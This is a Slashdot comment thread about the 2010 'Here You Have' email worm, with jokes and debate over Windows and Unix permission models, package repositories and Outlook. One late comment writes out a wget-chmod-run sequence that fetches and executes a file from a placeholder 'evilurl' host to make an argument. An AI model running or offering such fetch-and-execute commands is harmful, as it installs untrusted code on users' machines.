New Email Worm Squirming Through Windows Users' Inboxes

Trailrunner7 writes "There appears to be an actual email worm in circulation right now, using the tried-and-true infection method of sending emails containing malicious executables to all of the names in a user's email address book. The worm arrives via emails with the subject line 'Here You Have' or something similar, and the messages contain a link to a site that will download a malicious file to the victim's PC. The malware then drops itself into the Windows directory with a file name of CSRSS.EXE, which is identical to a legitimate Windows file. From there, it's 2001 all over again, as the worm attempts to mail itself to all of the contacts in the victim's Outlook address book."

Apples

[sexconker]

I thought worms were found in apples.

Re:Apples

[_Sprocket_]

No, they tend to stick to windows.

Re:Apples

[gmuslera]

That were with the old style apples... what newer ones have are iWorms

Re:Apples

[rickb928]

Usually only part of a worm.

For a whole worm, use Windows.... Mostly.

Re:Apples

[Erikderzweite]

That is why Steve Jobs takes a bite of every Apple he sells — to make sure there are no worms inside.

Re:Apples

[EEPROMS]

Apple iWorms are magical thus always turn up and give the user a positive and life changing experience

Re:Apples

[Psicopatico]

What's worse than biting an apple and find a worm?

Finding only half.

Re:Apples

[Erikderzweite]

Exactly. Does Steve Jobs look healthy for you? Now you know the reason why.

Re:Apples

[w0mprat]

Steve Jobs has worms? Would explain his reccent illness and weightloss.

Re:Apples

[pspahn]

Nah, those are those things you sometimes see floating around when you look at a clear blue sky. I had no idea what they were until I got a little older. Now it just pisses me off. Stupid iWorms.

Re:Apples

[drewhk]

They turn into -- Butterflies!!

Re:Apples

[splutty]

Nope. Worms carry Banana Bombs. (Shameless plug for the new Worms Reloaded ;)

Re:Apples

Exactly. Does Steve Jobs look healthy for you? Now you know the reason why.

It's from eating all those apples. Doctors refuse to approach him.

Re:Apples

[dirtyJay]

Magical butterfies, get it right!

Re:Apples

[drewhk]

I wanted to indicate that somehow, but I don't know the ASCII code for sparkles.

So that's why the UW mail system went down

[WillAffleckUW]

The entire UW mail system died yesterday morning.

Maybe this is why ...

Re:So that's why the UW mail system went down

[causality]

The entire UW mail system died yesterday morning.

Maybe this is why ...

It's an instance of the reason why. The actual reason is that the users still haven't learned from the last 9 years of experience. The only bad thing is that their stupidity is not self-contained and can affect the networks and computers of others. I say that because this time, it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack. It's one that is not remotely new and has provided numerous examples that the even slightly clueful have already learned from.

Re:So that's why the UW mail system went down

[MichaelSmith]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

Re:So that's why the UW mail system went down

[morgan_greywolf]

You'd think by now UW would have written their own mail client or something.....

Re:So that's why the UW mail system went down

...the users still haven't learned from the last 9 years of experience...

You mean they haven't learned to stop using Outlook?

Re:So that's why the UW mail system went down

[causality]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

I have no idea why you were modded "Troll" except that some people have an irrational oversensitivity to any mention of the iPod or iPad. They should get the fuck over it, to be direct about it.

Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them. This has trained the more point-and-drool type of user (the majority who gravitate to this platform) to just click away any dialogs without seriously questioning why a program is requesting extra access. That is, of course, assuming they are running as a non-privileged user in the first place.

The iPhone (I assume you don't intentionally refer to an mp3 player) approach is more like "you don't need root for anything, let us manage that". The Unix approach is more like "programs don't expect to have root privileges without a very good reason, like your package manager for example". In both cases an e-mail client would be run as a normal user. I'm not so familiar with the inner workings of an iPhone but at least on Unix and Unix-like OSs, the binary executable file would also reside in a root-owned directory not writable to any normal user. Combine that with the generally more clueful user base and it's easy to understand why Unix/Unix-like users just don't have these problems.

Re:So that's why the UW mail system went down

[93+Escort+Wagon]

You'd think by now UW would have written their own mail client or something.....

Problem is - those both suck (yes I'm at UW).

Of course like many universities, UW now offers hosted Gmail - a much better web option than pine or alpine IMHO. I reailze there are security implications using hosted Gmail, but when the other main option is UW servers accessed via Outlook then it's a bit harder to argue about Gmail's security.

Unfortunately, my department's default mail client is still Outlook. That decision was made by someone who's never used anything BUT Outlook, and so doesn't realize just how behind it is... several of us have argued for Thunderbird (which UW does officially support) but PHB always gives a rambling, incoherent statement against and it doesn't happen.

Re:So that's why the UW mail system went down

[DragonWriter]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to?

Normal, non-technical windows users often own their own machines; consequently, yes, they should be able to run an executable in a directory they are able to right to.

Re:So that's why the UW mail system went down

[Annorax]

No, it's more of the fact that "a sucker is born every minute" or more along the lines of every millisecond.

The college freshmen of today never experienced the "2001 all over again", so they are ripe for the pickings of email bombs that look "old hat" to old farts like us.

Re:So that's why the UW mail system went down

[WillAffleckUW]

We only have about six computers in our labs that run Windows, mostly for submission reasons, and unfortunately some of those are required to use Outlook. Most of the rest are Linux.

Re:So that's why the UW mail system went down

Actually, it's due to the decisions of incompetent, computer-illiterate, corrupt 'decision-makers', who have been coerced into signing 'MS junk only' support contracts, licensing deals, etc.

Go ahead, see if you can find out ANYTHING about your schools/employers MS contracts. Good luck with that.
The secrecy keeps the corruption under wraps, sending billions to MS, while billions more ate up in 'support issues', etc. Dunce-head 'administrators' think infected computers are just the way the world works, and sign some contracts and send loads of money to look after all of these 'problems'. Great for business, not so good for anyone else who wants to actually use a computer to accomplish something.

Re:So that's why the UW mail system went down

[causality]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to?

Normal, non-technical windows users often own their own machines; consequently, yes, they should be able to run an executable in a directory they are able to right to.

It's not so much about whether you should be allowed to do with your own property what you wish. Of course you should. It's more like the security model of capabilities. If there is no good reason to allow something to happen then it is better security not to allow it.

This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing. A Linux user can have the full use of their system without ever having to directly download a binary executable and then run that executable just to install or use a piece of software. Instead, they have package managers and repositories which have all but eliminated the issues of third-party malware.

By contrast, on Windows it is far more common to directly download an "Installer.exe" file and then run that installer in the directory into which it was downloaded and with the elevated privileges needed to install software. That introduces problems when such executables come from untrustworthy sources. Introducing undetected malware into a Linux repository is much more difficult and thus has occurred far less frequently than the much easier task of conducting a social engineering attack against a user of an e-mail client.

The way things are done on Windows makes it far more prone to these attacks. The fact that the average Windows user is much less knowledgable than the average *nix user compounds the problem. That's why you have attacks that are about nine years old that are still successful, which is really quite pathetic.

Re:So that's why the UW mail system went down

[binarylarry]

I think a better route would be make that the default method/policy and make it hard for the average user to it.

That would sit better with me than the Apple "We fucking own you" approach that requires you to physical hack the product you just "bought."

Re:So that's why the UW mail system went down

[causality]

Devils advocate here: is there any reason why a normal non-technical people should be using computers?

There, fixed that for you. If people can't be bothered to learn how to use computers, then they should stay the fuck away from computers.

There are such things as learning experiences, where you make a mistake, pay the price, and learn your lesson. What really amazes me are what I call the "permanent noobs". They're the people who manage to use a system for years and years without ever knowing more about it than when they first started. It's like they hate learning and hate understanding the tools they use, and will actively resent anyone who suggests that they should have picked up a clue or two during their years of experience with a system.

It's understandable that if you are new to something and have little or no experience, then you won't be knowledgable. Expecting otherwise is exceedingly unrealistic. Every expert was once a beginner. But for the people who have had years of time to learn the most basic things, to acquire the most basic good practices, something is wrong with them. This should be classified as a type of learning disability, regarded as a pathology, and treated accordingly.

Re:So that's why the UW mail system went down

[Erikderzweite]

New users keep coming as even more PCs are sold. Blinded by marketspeak about how easy a PC (i.e. Windows) is, they refuse to learn. That is very unfortunate because said people have vast computing powers that easily outperform supercomputers just a few decades old. Coupled with the attitude that their time is too valuable to learn something about computers they use (insert your favorite car analogy here) this refusal to educate themselves creates an ever growing problem for the network as a whole: when a PC is infected to a crawl these people tend to buy a new one, with even more computing power.

Re:So that's why the UW mail system went down

[ShaunC]

The iPhone (I assume you don't intentionally refer to an mp3 player)

FYI, the iPod Touch models do just about everything the iPhone does, except take pictures and make phone calls.

Re:So that's why the UW mail system went down

[DragonWriter]

It's not so much about whether you should be allowed to do with your own property what you wish. Of course you should. It's more like the security model of capabilities. If there is no good reason to allow something to happen then it is better security not to allow it.

I am aware of the basis of your questions; what I am saying is that fact that normal, non-technical Windows users often don't have someone else to administer their machines means that they have to be able to run executables from directories that they can write to.

Now, distinct security roles for the same user can mitigate some of this is risk, and it might make sense to not allow a normal Windows user to run code that they have "casual" write access to (e.g., without escalating to an administrative role temporarily), but the problem with that without is finding a way to make the security model simple and comprehensible enough that users don't simply get into the habit of escalating to an administrative role to do things without understanding what they are doing.

This is not a particular easy problem, because for a general purpose computer, you have to have a fairly fine grained security model to allow software to do what the user wants it to but not other things, and non-technical users aren't going to want to learn the details of a fine-grained security model.

Instead, they have package managers and repositories which have all but eliminated the issues of third-party malware.

I don't think that's really all that true; if Linux becomes popular enough with casual users that the kind of malware that is directed at them becomes worth targeting at the platform, third party repositories will be setup and emailed invitations distributed to add them and download screen savers and other seemingly-innocuous software from them. Which will, of course, be malware that the users are being tricked into installing with elevated privileges. (Of course, you can install packages on Linux straight from files -- even files in email -- since, e.g., Ubuntu, IIRC, runs the graphical package manager by default if you click on a .deb; while many Linux systems have security models that are somewhat better than Windows, I don't think they are all that much more secure against social engineering directed at non-technical users with administrative rights on their own boxes.)

Re:So that's why the UW mail system went down

[Missing.Matter]

A repository wouldn't change anything in this situation. It's incredible, but I guarantee you most people who installed this probably have heard that malware can come in e-mail attachments. My direct family is all aware of this, and how many times have I been called over to fix something because they thought it was "okay?" Another poster here related how his friend downloaded this very worm, despite the fact he thought it was shady.

So we have a situation where users are happy to install programs not just from an unknown source, but from a very likely unsafe source! Why? Who knows? They need to see that latests celeb sex tape or are waiting for an attachment and didn't pay close attention what they're clicking on.

So yeah, let's give these users a repo and tell them it's safe and they can only install programs from there. Oh but wait, now they want a piece of software that isn't in the repo, and again we're in a situation where users have to judge for themselves how legitimate a piece of software is; I've already demonstrated how that usually turns out.

Re:So that's why the UW mail system went down

[Mongoose+Disciple]

You mean they haven't learned to stop using Outlook?

In the business world, there still isn't a replacement for it that's good enough.

It's sad, but, there it is.

Re:So that's why the UW mail system went down

is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to?

If the user decided to change their umask, who are you to call them non-technical, you arrogant pri--what? Windows still doesn't have umask or use file permissions to control executability? Oops, never mind.

The real answer to your question is that there shouldn't be such a thing as a "normal non-technical windows user." If you use Windows, you damn well better be a computer wiz and it's not intended for other types of people. The owner of a gun with a U-shaped barrel which points at the holder, does need gun safety lessons.

Re:So that's why the UW mail system went down

[causality]

So yeah, let's give these users a repo and tell them it's safe and they can only install programs from there. Oh but wait, now they want a piece of software that isn't in the repo, and again we're in a situation where users have to judge for themselves how legitimate a piece of software is; I've already demonstrated how that usually turns out.

Ah but that's a direct refusal to utilize the software repos as a trusted source. Just because a user refuses to get their software from a trusted source does not constitute a flaw in the trusted source. To give a car analogy, sure you can drive your car without a seatbelt, but it won't surprise anyone if you are seriously injured in an accident that you could have walked away from. That doesn't mean that seatbelts don't work or aren't a good idea.

Re:So that's why the UW mail system went down

[causality]

New users keep coming as even more PCs are sold. Blinded by marketspeak about how easy a PC (i.e. Windows) is, they refuse to learn. That is very unfortunate because said people have vast computing powers that easily outperform supercomputers just a few decades old. Coupled with the attitude that their time is too valuable to learn something about computers they use (insert your favorite car analogy here) this refusal to educate themselves creates an ever growing problem for the network as a whole: when a PC is infected to a crawl these people tend to buy a new one, with even more computing power.

That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues. Until then, Microsoft gets to profit handsomely from Windows and Windows software without bearing any of the cost of its downsides. That gives them the rightful status of a parasite. This is what needs to change.

Re:So that's why the UW mail system went down

[sqlrob]

Windows still doesn't have umask or use file permissions to control executability?

Uhh, yeah it does and has since NTFS was released. ACLs are inherited (not quite umask, but close), and you can make something non-executable with permissions.

Re:So that's why the UW mail system went down

[node_chomsky]

...except take pictures and make phone calls.

Which is what makes it an iPhone as opposed to an iPod.

Re:So that's why the UW mail system went down

[Timmy+D+Programmer]

I'm still constantly fighting with management at my company who think outlook is the "Standard" and want it. This is one of the major reasons i do NOT want it. If I ever loose that battle, I will make sure the first time this happens that the decision maker gets full credit for the decision.

Re:So that's why the UW mail system went down

[SideshowBob]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

It's certainly possible for a Linux user to download an executable to his/her home directory and run it. That was GP's point.

Re:So that's why the UW mail system went down

[Missing.Matter]

But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

If these people wouldn't change change their behavior if their lives literally depended on it. What makes you think they'll stick in their trusty repo garden?

And as DragonWriter pointed out, if users are taught to trust repos, it's only a matter of time until these users are directed to a "sexy celeb screensaver" repo of filth.

Re:So that's why the UW mail system went down

[sjames]

It is, in part, a long standing design error. The actions for viewing a document and for running an executable are exactly the same. The error was compounded by hiding all evidence in the UI that a given file is actually an executable.

The result is and was entirely predictable.

Re:So that's why the UW mail system went down

[RocketRabbit]

The reason that Pine isn't used any more is because MS gave a bunch of money to UW, on the understanding that they would switch away from Unix wherever possible.

Re:So that's why the UW mail system went down

[c6gunner]

That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

I agree. Likewise, Volkswagen should be sued into bankruptcy for marketing their vehicles as "people cars". They should either be forced to change the name to Technischversiertenwagen, or pay monetary damages to anyone and everyone who suffers in an way due to car accidents.

Re:So that's why the UW mail system went down

[causality]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

Back on topic, what you mention is a very good idea. It's also not new to Apple products at all. That's the approach Unix has used for a long, long time now. Installed programs on a Unix system are generally root-owned and sit in directories that are also root-owned. For a normal user, both the executable and the directory in which it is located is read-only.

It's certainly possible for a Linux user to download an executable to his/her home directory and run it. That was GP's point.

Sure. For that matter, it's possible for you to deliberately chew on broken glass. So what? The point is, Linux users have little or no need to get their software that way. So they overwhelmingly tend not to do so. I don't know how to make this any simpler. There are none so blind as those who refuse to see and you very well may be one of those.

Re:So that's why the UW mail system went down

[MrCrassic]

Email servers should be blocking emails with .EXE files before they even get anywhere close to the user's inbox. I guess this will expose systems that need a bit of work...

Re:So that's why the UW mail system went down

[drsmithy]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to?

So they can run legitimate software they may have downloaded, compiled, or otherwise acquired themselves ?

Re:So that's why the UW mail system went down

By that logic, why implement any security measures at all? They can always be circumvented by an idiot user.

Re:So that's why the UW mail system went down

[drsmithy]

This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing.

No, it does not. The only real barrier to something like that on Windows is the usual cries of "monopoly", which tend to be louder on Slashdot than anywhere else.

If Microsoft released Windows with a default configuration that could only install applications they approved of, Slashdot would be in a state of apoplectic outrage, even if it was trivially simple (say, a checkbox in a control panel) to turn that feature off (that is to say, defeat the purpose of having it at all).

Re:So that's why the UW mail system went down

[dbIII]

The college freshmen of today never experienced the "2001 all over again"

That's right all you college freshmen going ape at parties, don't touch that big black monolith or bad stuff will happen.

Re:So that's why the UW mail system went down

[Drgnkght]

I've seen one of these emails at work today. The payload was a link to a website hosting an executable with the .scr file extension. There is no executable content in the message itself. The hyperlink was crafted so it appeared to link to a document. In the message I received it was disguised as a PDF file.

Re:So that's why the UW mail system went down

[causality]

But as you point out seat belts only work if people use them, and if you remember, there was a lot of resistance to the idea despite the evidence that seat belts save lives. My grandmother refuses to wear one to this day because it's "uncomfortable."

If these people wouldn't change change their behavior if their lives literally depended on it. What makes you think they'll stick in their trusty repo garden?

Forgive my blatant insensitivity but that's the sort of person for whom the Darwin Awards site was created. In other words, it's not a huge surprise when someone who values a slight amount of comfort over life and limb suffers injury to life and limb. It's unfortunate but that's the priorities the person has chosen to have. I deal in reality however ugly it may sometimes be. In this case, it's ugly. I hope the lady never has to find out the hard way why her decision was a bad one.

And as DragonWriter pointed out, if users are taught to trust repos, it's only a matter of time until these users are directed to a "sexy celeb screensaver" repo of filth.

That's the difference between official repos endorsed and maintained by your distribution and unofficial third-party repos. There's a significant difference there. Not the least of which is that a user has to go out of their way (often editing config files) to enable a third-party repo. That makes it less likely that a user with no knowledge of how the system works is going to do that. It certainly doesn't make it impossible, nor is this the intent of the design, but it does ensure that a user who selects third-party repos is doing so at their own risk and has to take the intiative to make them available. That's still a damn sight better than the way things work on Windows.

Re:So that's why the UW mail system went down

[turbidostato]

"it isn't really a technical flaw in Windows since I don't see any reports of the e-mail attachments being automatically executed. This is more like a social engineering attack."

In a single word: PEBKAC

Re:So that's why the UW mail system went down

[MichaelSmith]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to?

So they can run legitimate software they may have downloaded, compiled, or otherwise acquired themselves ?

Perhaps they should just have to explicitly state that they want to run an downloaded program. Enter their password and read a warning. And yeah I kow, if they have to do it all the time they will just click yes without thinking.

Re:So that's why the UW mail system went down

[MrCrassic]

Yeah, you're right. I got a notification about this at work today as well, though we weren't affected by it. Sorry about the misinformation!

Re:So that's why the UW mail system went down

[turbidostato]

"I think a better route would be make that the default method/policy and make it hard for the average user to it."

Microsoft marketing droids think otherwise.

And free market has shown them right by making Bill Gates one of the richest men in planet.

Re:So that's why the UW mail system went down

[causality]

This breaks down in Windows because Windows does not have a centralized package manager that handles both the installation and the uninstallation of all new software. The proprietary nature of most Windows software would preclude such a thing.

No, it does not. The only real barrier to something like that on Windows is the usual cries of "monopoly", which tend to be louder on Slashdot than anywhere else.

If Microsoft released Windows with a default configuration that could only install applications they approved of, Slashdot would be in a state of apoplectic outrage, even if it was trivially simple (say, a checkbox in a control panel) to turn that feature off (that is to say, defeat the purpose of having it at all).

I think you fail to appreicate the proprietary nature of most Windows software. Even the freeware is closed-sourced and copyrighted in such a way that you are not authorized to redistribute it. That means you cannot legally operate a repository containing a library of Windows software from a single source, because you'd have to get written permission from the authors of each individual piece of software allowing you to redistribute their software from your single source. It'd be an absolute nightmare and one mistake would make you end up on the wrong end of a lawsuit.

That is, of course, not beginning to address the issues surrounding the redistribution of commercial for-pay software. Redistributing that without the express blessing of the creator is usually called "piracy" and may be severely punished by the civil courts.

The only way around this would be for Microsoft to create a walled-garden type of environment sort of like Apple's App Store. Then they could dictate what licenses and/or terms of copyright are and are not acceptable. But you better believe that this would raise monopoly issues when that single vendor controls over 90% of the marketshare. Want your software to reach 90% of all desktop users? Then you play by their rules, or else. At that point the software license is no longer between the vendor and the user who is their customer; Microsoft is now the referee whether or not this is against the will of the vendor or user.

You may characterize concerns about monopoly power as categorically illegitimate and overblown in all possible cases. I do not. It is not desirable for anyone to give Microsoft that kind of power over that many users. Centralized package managers just aren't compatible with monopolies and proprietary licenses for a wide variety of good reasons that aren't just going to go away.

A centralized package manager for Windows is such a great idea that it would have been implemented by now except that there are some damned good reasons why such a thing is destined to fail miserably.

Re:So that's why the UW mail system went down

[DinDaddy]

FYI, the iPod Touch models do just about everything the iPhone does, except take pictures and make phone calls.

You're a week out of date. The new touch has front and rear cameras similar to the new iphone.

On topic, 150+ of these landed in my email box today. If my company had any sense of fairness, they would harvest the names of everyone infected's email account, and force them to sit through a 4 hour learning module. We already take a yearly 1/2 hour session where they very explicitly explain not to click on links in things like this.

Re:So that's why the UW mail system went down

[reboot246]

Check out the specs on the new iPod touch 4G.

"It is essentially an iPhone 4, minus the phone and SMS functions. Jobs himself stated this in no uncertain words in his presentation."

Re:So that's why the UW mail system went down

Windows does do this. An executable (.exe or .scr) that was downloaded using a supported browser (IE, Firefox?, Chrome) or an e-mail client (Outlook) must be permitted by the user to run. It gets permanently flagged as unsafe. To de-flag the file, you have to edit its properties or check an extra tickbox in the warning dialog. Here is what it looks like.

Re:So that's why the UW mail system went down

[afabbro]

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

I'm not sure that would have made any difference here. If I run an executable, it can look at my address book, send emails, etc., without any special elevated privileges. Same thing could happen on Unix - it's just that Unix isn't as widely deployed.

Re:So that's why the UW mail system went down

[symbolset]

In the business world, there still isn't a replacement for it that's good enough.

You know, since we're in the 2010 Email Worm thread I have to ask: Is there a worse one?

Re:So that's why the UW mail system went down

Since we're off topic, can someone explain why Thunderbird is better than Outlook?
No heavy details needed, just a summary with a little explanation.
A business case from 93 Escort Wagon would be appreciated.

Re:So that's why the UW mail system went down

[MichaelSmith]

So how did this happen:

The malware then drops itself into the Windows directory with a file name of CSRSS.EXE, which is identical to a legitimate Windows file. From there, it's 2001 all over again, as the worm attempts to mail itself to all of the contacts in the victim's Outlook address book.

Does the flagging mechanism not notice that the file has changed?

Re:So that's why the UW mail system went down

[causality]

That's why I'd like to see Microsoft forced to assume product liability so long as they market their software to the general public on the basis of "ease of use". Either market it to "technically knowledgable users only" or pay monetary damages to anyone and everyone who suffers in any way due to security issues.

I agree. Likewise, Volkswagen should be sued into bankruptcy for marketing their vehicles as "people cars". They should either be forced to change the name to Technischversiertenwagen, or pay monetary damages to anyone and everyone who suffers in an way due to car accidents.

While I appreciate your sarcasm I believe it is thoroughly misplaced.

Microsoft has little or nothing in common with car manufacturers. The car manufacturers actually have to meet certain safety/quality standards and face both regulatory and civil liability if they fail. Microsoft doesn't. Drivers have to demonstrate at least enough competence to obtain a license to use car manufacturers' products; computer users don't. Drivers are legally required to observe best practices and are held financially responsible (usually by the requirement that they carry liability insurance) and maybe even criminally responsible for any damages caused by their failure to do so. Car manufacturers who make defective parts can be forced to conduct a recall for which they must bear all expenses. No such requirement applies to Microsoft.

Microsoft and Volkswagen are not remotely comparable. If you think they should be, then I say let's hold both to the standard that applies to Volkswagen. This wouldn't be unusual anyplace except the software industry. Manufacturers of physical goods of all sorts, not just automobiles that require a license to operate, are expected to pay for their negligence. If software companies want intellectual property to be treated like physical property then let them bear the same amount of liability bourne by any manufacturer of physical property. If they don't want that amount of liability then let them abandon the artificial scarcity model that is the essence of intellectual property. Right now they are having their cake and eating it too and I have no idea why anyone would defend this sorry state of affairs.

Re:So that's why the UW mail system went down

[causality]

It is, in part, a long standing design error. The actions for viewing a document and for running an executable are exactly the same. The error was compounded by hiding all evidence in the UI that a given file is actually an executable.

The result is and was entirely predictable.

It is an essential part of Ameircan culture to have a seething, burning hatred for the practice of addressing and mitigating readily predictable losses before they happen. No one in government does that, few in their personal lives do that, and few in business ever do that. The case could be made that it's part of the anti-intellectualism that is so prevalent, as forethought can be understood as an intellectual activity.

Re:So that's why the UW mail system went down

[spun]

I've heard this worm only infects users who are prone to both sexually harassing coworkers and stealing from the company. I'm notifying HR.

Re:So that's why the UW mail system went down

[c6gunner]

I can't believe you took the time to write that much.

Point I was making: what you're calling negligence, isn't. If your house gets broken into, you don't get to sue the lock manufacturer because tumblers are so easy to pick. If your car breaks down because you never change the oil, you don't get to sue Ford. If you can't program your VCR clock because you're an idiot, you don't get to sue RCA. And if you fail to grasp these simple concepts, don't expect to be taken seriously.

And no, I would never want OS manufacturers to be held to the same standards as the car industry, since this would effectively kill off the Open Source movement.

Re:So that's why the UW mail system went down

[causality]

"I think a better route would be make that the default method/policy and make it hard for the average user to it."

Microsoft marketing droids think otherwise.

And free market has shown them right by making Bill Gates one of the richest men in planet.

It's a market alright but I wouldn't call it a free market. A free market assumes that everyone involved is rational and acting in their own interests. A staggering level of ignorance on the part of the buyers that is nowhere to be found on the part of the sellers will drastically alter this equation in favor of the sellers. That means it is no longer a mutual agreement between equals. That doesn't make the sellers correct. It makes them more powerful.

This situation has no claim to legitimacy. It's old-fashioned might-makes-right. The reason why is simple. The degree to which one side is far more powerful than the other is the same degree to which the less-powerful side is no longer making a truly free choice.

Re:So that's why the UW mail system went down

[CAIMLAS]

I'm not sure we're reading the same thing, here.

What is it about UNIX design/philosophy, particularly as it is usually imlemented, that prohibits a user from:

1) clicking on a link in an email
2) downloading a binary and/or script
3) running said script/binary (granted, they'd have to chmod +x first, so there's at least a modicum of technical competency required before this would work)
4) shitting more worms across the Internet as they spam everyone on their Thunderbird/Kmail/whatever address book via their upstream SMTP server

Seriously. Does the iPhone actually do anything that (say) could not be done with Windows 7? No, not really.

Re:So that's why the UW mail system went down

[neonmonk]

Great. So what would you replace it with? Because until thunderbird can at the very least do tables, handle signatures and signature creation elegantly, handle inserted images elegantly, (decent) groupware calendaring without a third party extension, plus a host of other minor and not so minor annoyances, it is not ready for the enterprise.

Unfortunately, Outlook is the best email client out there. There are no contenders.

Re:So that's why the UW mail system went down

[neonmonk]

This worm isn't Outlook's fault, it has a link to a website, that's it. It's all on the user.

Re:So that's why the UW mail system went down

[Missing.Matter]

That's the difference between official repos endorsed and maintained by your distribution and unofficial third-party repos. It certainly doesn't make it impossible, nor is this the intent of the design, but it does ensure that a user who selects third-party repos is doing so at their own risk and has to take the intiative to make them available. That's still a damn sight better than the way things work on Windows.

Except the official repos don't contain every piece of software out there. I recently tried out the new beta of Ubuntu, and the very first piece of software I wanted to install wasn't in the repo (Opera).

So say I set a user up with Ubuntu, and tell him to only install software from the package manager. Well, he doesn't care about 99% of the packages in there anyway; he wants software_X which isn't part of the repo, so he searches on how to find it. He stumbles upon some instructions, enters his password happily when prompted, and is saddled with the same worm we're talking about today.

How has the package manager played any part in saving this user from himself? A package manager is only a form of security if it is the ONLY way to load software onto the machine, and as Apple is finding out it starts getting awful hard approving what software gets admitted

There's a significant difference there. Not the least of which is that a user has to go out of their way (often editing config files) to enable a third-party repo.

So the system is more secure because it's a pain in the ass to install new software outside of the distribution's repo, malicious or otherwise. Of course as I've stated above, it really isn't all that hard to install third party software outside of the distro's repo.

Re:So that's why the UW mail system went down

I don't know what happened. The file needs to run to copy itself. It also needs admin privs. Copying it with the shell retains the flag. Either the person uses XP/below or an ancient Outlook version. The global prevention mechanism I mentioned was backported to XP SP2, as listed here. It also says that IE6 and Outlook 2000 supported an older concept of "unsafe files" (2-3 dozen extensions in total) and prevented/warned of their execution. Either way, this person had to expressly allow the program to run.

Re:So that's why the UW mail system went down

[profplump]

No, they really shouldn't. They should temporarily authenticate as a privileged user to install new software, then return to their normal, unprivileged state to actually run it.

Re:So that's why the UW mail system went down

[lorenlal]

Well, when you deploy proper virus detection and mitigation, the worm can be detected and cleaned post-infection. The process won't have the ability to dink with the virus scanner, the core OS files, or bootloader unless the worm can take advantage of some privilege escalation flaw.

In Windows, the vast majority of home users run with admin privs, which means the scanner needs to be able to pick off the infection before the infection occurs. In many of those cases, the system becomes compromised in a way that the scanner is disabled, or can't update, or the virus is able to hide itself from the OS.

So, sure an end user could download and execute the worm, but the Unix example is significantly easier to contain... Unless of course the worm leverages a flaw in the OS... In that case all bets are off.

Re:So that's why the UW mail system went down

[MeNeXT]

Is there any reason to run an executable directly from an email or straight off the Net?

Re:So that's why the UW mail system went down

[DAldredge]

The next to last ios exploit was caused by simply clicking on a pdf file so it appears they really aren't that much more secure.

Re:So that's why the UW mail system went down

Devils advocate here: is there any reason why a normal non-technical windows user should be able to run an executable in a directory they are able to write to? Maybe the ipod/ipad approach is better for most people.

For a normal user, both the executable and the directory in which it is located is read-only.

someidiot@honeypot:~$ wget http://evilurl/nastyfile -O ~/nastyfile
someidiot@honeypot:~$ chmod +x ~/nastyfile
someidiot@honeypot:~$ ~/nastyfile
Now, you were referring to "installed" programs. But the situation being discussed here is not for "installed" programs. (see the GP)

The problem with Windows is the vast amount of software that is poorly designed and wants Admin privileges even though it could be designed to carry out its task without them.

The problem with Windows is backwards compatibility. UAC exists, but had to be neutered to allow older/outdated programs to continue to run.

Ideally, we would have an architecture where there could be granular executable security (ala SELinux); where programs would only have access to very specific paths/ports/programs despite the privileges of the user.
Unfortunately (and perhaps by-design) SELinux is _NOT_ very user friendly and provides no way for a standard user to override its protections (AFAIK).

I guess I'm partial to the BlackBerry approach where you (or your admin) set default rights for programs such as "Internet: Allow/Prompt/Deny, Phone: A/P/D, Files: A/P/D, Email: A/P/D" -- programs can request more access, but the user has the ability to override the request (or accept it).
That way, you can run "untrusted code" but give it a choice between access to the internet or access to personal information (email, phone, etc), plus, at the "Prompt" level for "Internet", you'll even get details on what sites are being accessed.

PS: Sorry for the Blackberry mention, but I was surprised/annoyed to find out that neither Android or iOS support overriding the application's requested security permissions. Which is unfortunate, because I really wanted an Android phone but it doesn't meet my paranoia requirements :(
(wtf does a wallpaper app need access to the phone (and internet) for?!)

Re:So that's why the UW mail system went down

[turbidostato]

"It's a market alright but I wouldn't call it a free market. A free market assumes that everyone involved is rational and acting in their own interests."

I'm all in with respect of Microsoft being an almost monopoly and how that affects the market, but I can't sign that one: a free market assumes that everyone *have the means* for everyone to be rational and action in their own interests. But having the means and having the interest is a different thing: if someone wants to go nuts, it is his issue -after all, it couldn't be free market if you are forced to behave properly with regards to your own interests.

"less-powerful side is no longer making a truly free choice."

